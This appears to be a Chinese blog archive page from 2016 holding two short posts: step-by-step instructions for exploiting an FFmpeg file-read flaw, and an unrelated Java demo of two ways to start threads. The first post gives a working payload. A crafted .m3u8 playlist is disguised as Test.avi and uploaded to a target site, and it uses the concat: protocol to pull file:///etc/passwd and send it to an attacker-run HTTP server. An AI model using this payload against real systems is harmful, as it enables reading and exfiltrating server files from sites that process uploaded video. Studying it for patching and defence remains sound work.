2016年5月

FFmpeg文件读取漏洞测试

用python监听一个http端口:python -m SimpleHTTPServer
然后在网站根目录下面上传一个文件
header.m3u8
内容为
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://xxxxxx:8000? //网站url

之后在目标站上传
Test.avi
内容为
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://xxxxxx:8000/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

test.rar

java多线程的两种方式

package com.zmc.test;

public class test {
    public static void main(String[] args) {
        /**
         * demo1
         */
        Thread thread=new Thread(){
            public void run(){
                while (true) {
                    try {
                        //设置现成休眠500毫秒(0.5秒)
                        Thread.sleep(500);
                    } catch (InterruptedException e) {
                        // TODO Auto-generated catch block
                        e.printStackTrace();
                    }
                    System.out.println("1:"+Thread.currentThread().getName());
                }
            }
        };          
        thread.start();
        
        /**
         * demo2
         */
        Thread thread2=new Thread(new Runnable() {
            @Override
            public void run() {
                while (true) {
                    System.out.println("2:"+Thread.currentThread().getName());
                }
            }
        });
        thread2.start();
    }

}